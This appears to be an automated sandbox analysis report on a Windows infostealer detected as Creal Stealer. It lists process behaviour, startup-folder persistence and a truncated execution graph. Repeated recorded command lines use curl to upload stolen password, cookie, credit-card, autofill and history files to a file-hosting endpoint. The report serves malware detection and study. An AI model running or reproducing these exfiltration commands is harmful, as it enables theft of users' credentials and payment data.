                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                              Start time:03:09:21
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
                                                                                                                                                                                                              Imagebase:0x7ff60d430000
                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                              Start time:03:09:22
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                              Start time:03:09:22
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                              Start time:03:09:22
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
                                                                                                                                                                                                              Imagebase:0x7ff60d430000
                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                              Start time:03:09:22
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                              Start time:03:09:22
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                              Start time:03:09:22
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
                                                                                                                                                                                                              Imagebase:0x7ff60d430000
                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                              Start time:03:09:22
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                              Start time:03:09:22
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                              Start time:03:09:23
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
                                                                                                                                                                                                              Imagebase:0x7ff60d430000
                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                              Start time:03:09:24
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\dllhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                                                                                                                                                              Imagebase:0x7ff733cd0000
                                                                                                                                                                                                              File size:21'312 bytes
                                                                                                                                                                                                              MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                              Start time:03:09:25
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe"
                                                                                                                                                                                                              Imagebase:0x7ff7c3ce0000
                                                                                                                                                                                                              File size:17'171'619 bytes
                                                                                                                                                                                                              MD5 hash:DA1695DBA8BD25D00E05E7769D6D7E8E
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                              Start time:03:09:28
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe"
                                                                                                                                                                                                              Imagebase:0x7ff7c3ce0000
                                                                                                                                                                                                              File size:17'171'619 bytes
                                                                                                                                                                                                              MD5 hash:DA1695DBA8BD25D00E05E7769D6D7E8E
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000003.1716089607.000002085E24E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                              Start time:03:09:32
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                              Start time:03:09:32
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                              Start time:03:09:32
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:tasklist
                                                                                                                                                                                                              Imagebase:0x7ff7df590000
                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                              Start time:03:09:36
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                              Start time:03:09:36
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                              Start time:03:09:36
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
                                                                                                                                                                                                              Imagebase:0x7ff60d430000
                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                              Start time:03:09:37
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
Imagebase:0x7ff778450000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:03:09:37
Start date:16/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff70f010000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:37
Start time:03:09:37
Start date:16/01/2025
Path:C:\Windows\System32\curl.exe
Wow64 process (32bit):false
Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
Imagebase:0x7ff60d430000
File size:530'944 bytes
MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:03:09:39
Start date:16/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
Imagebase:0x7ff778450000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:03:09:39
Start date:16/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff70f010000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:03:09:39
Start date:16/01/2025
Path:C:\Windows\System32\curl.exe
Wow64 process (32bit):false
Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
Imagebase:0x7ff60d430000
File size:530'944 bytes
MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:03:09:42
Start date:16/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
Imagebase:0x7ff778450000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:03:09:42
Start date:16/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff70f010000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:43
Start time:03:09:42
Start date:16/01/2025
Path:C:\Windows\System32\curl.exe
Wow64 process (32bit):false
Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
Imagebase:0x7ff60d430000
File size:530'944 bytes
MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:44
Start time:03:09:42
Start date:16/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
Imagebase:0x7ff778450000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:45
Start time:03:09:42
Start date:16/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff70f010000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:46
Start time:03:09:42
Start date:16/01/2025
Path:C:\Windows\System32\curl.exe
Wow64 process (32bit):false
Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
Imagebase:0x7ff60d430000
File size:530'944 bytes
MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:47
                                                                                                                                                                                                              Start time:03:09:42
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:48
                                                                                                                                                                                                              Start time:03:09:42
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:49
                                                                                                                                                                                                              Start time:03:09:42
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
                                                                                                                                                                                                              Imagebase:0x7ff60d430000
                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:11.1%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                Signature Coverage:20.3%
                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                Total number of Limit Nodes:45
7ff67a61ad3a RtlCaptureContext RtlLookupFunctionEntry 15832->15833 15834 7ff67a61adaa IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15833->15834 15835 7ff67a61ad74 RtlVirtualUnwind 15833->15835 15836 7ff67a61adfc _wfindfirst32i64 15834->15836 15835->15834 15837 7ff67a60bdc0 _wfindfirst32i64 8 API calls 15836->15837 15838 7ff67a61ae1b GetCurrentProcess TerminateProcess 15837->15838 15840 7ff67a613822 15839->15840 15841 7ff67a613895 15839->15841 15842 7ff67a613828 15840->15842 15843 7ff67a6138bf 15840->15843 15844 7ff67a61389a 15841->15844 15845 7ff67a6138ef 15841->15845 15850 7ff67a61382d 15842->15850 15854 7ff67a6138fe 15842->15854 15922 7ff67a611d90 15843->15922 15846 7ff67a61389c 15844->15846 15847 7ff67a6138cf 15844->15847 15845->15843 15845->15854 15856 7ff67a613858 15845->15856 15849 7ff67a61383d 15846->15849 15853 7ff67a6138ab 15846->15853 15929 7ff67a611980 15847->15929 15864 7ff67a61392d 15849->15864 15904 7ff67a614144 15849->15904 15850->15849 15855 7ff67a613870 15850->15855 15850->15856 15853->15843 15858 7ff67a6138b0 15853->15858 15854->15864 15936 7ff67a6121a0 15854->15936 15855->15864 15914 7ff67a614600 15855->15914 15856->15864 15943 7ff67a61ef18 15856->15943 15858->15864 15918 7ff67a614798 15858->15918 15860 7ff67a60bdc0 _wfindfirst32i64 8 API calls 15862 7ff67a613bc3 15860->15862 15862->15735 15864->15860 15866 7ff67a6134c9 15865->15866 15867 7ff67a6134b3 15865->15867 15870 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 15866->15870 15883 7ff67a613507 15866->15883 15868 7ff67a613822 15867->15868 15869 7ff67a613895 15867->15869 15867->15883 15871 7ff67a613828 15868->15871 15872 7ff67a6138bf 15868->15872 15873 7ff67a61389a 15869->15873 15876 7ff67a6138ef 15869->15876 15870->15883 15878 7ff67a61382d 15871->15878 15880 7ff67a6138fe 15871->15880 15877 7ff67a611d90 38 API calls 15872->15877 15874 7ff67a61389c 15873->15874 15875 7ff67a6138cf 15873->15875 15879 7ff67a61383d 15874->15879 15886 7ff67a6138ab 15874->15886 15881 
7ff67a611980 38 API calls 15875->15881 15876->15872 15876->15880 15893 7ff67a613858 15876->15893 15877->15893 15878->15879 15884 7ff67a613870 15878->15884 15878->15893 15882 7ff67a614144 47 API calls 15879->15882 15894 7ff67a61392d 15879->15894 15885 7ff67a6121a0 38 API calls 15880->15885 15880->15894 15881->15893 15882->15893 15883->15735 15887 7ff67a614600 47 API calls 15884->15887 15884->15894 15885->15893 15886->15872 15888 7ff67a6138b0 15886->15888 15887->15893 15890 7ff67a614798 37 API calls 15888->15890 15888->15894 15889 7ff67a60bdc0 _wfindfirst32i64 8 API calls 15891 7ff67a613bc3 15889->15891 15890->15893 15891->15735 15892 7ff67a61ef18 47 API calls 15892->15893 15893->15892 15893->15894 15894->15889 16101 7ff67a610f54 15895->16101 15899 7ff67a614a17 15898->15899 16118 7ff67a61e078 15899->16118 15905 7ff67a614166 15904->15905 15953 7ff67a610dc0 15905->15953 15909 7ff67a6142a3 15912 7ff67a614a00 45 API calls 15909->15912 15913 7ff67a61432c 15909->15913 15911 7ff67a614a00 45 API calls 15911->15909 15912->15913 15913->15856 15915 7ff67a614618 15914->15915 15917 7ff67a614680 15914->15917 15916 7ff67a61ef18 47 API calls 15915->15916 15915->15917 15916->15917 15917->15856 15921 7ff67a6147b9 15918->15921 15919 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 15920 7ff67a6147ea 15919->15920 15920->15856 15921->15919 15921->15920 15923 7ff67a611dc3 15922->15923 15924 7ff67a611df2 15923->15924 15926 7ff67a611eaf 15923->15926 15925 7ff67a610dc0 12 API calls 15924->15925 15928 7ff67a611e2f 15924->15928 15925->15928 15927 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 15926->15927 15927->15928 15928->15856 15930 7ff67a6119b3 15929->15930 15931 7ff67a6119e2 15930->15931 15933 7ff67a611a9f 15930->15933 15932 7ff67a610dc0 12 API calls 15931->15932 15935 7ff67a611a1f 15931->15935 15932->15935 15934 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 15933->15934 15934->15935 15935->15856 15937 7ff67a6121d3 15936->15937 15938 7ff67a612202 15937->15938 15940 
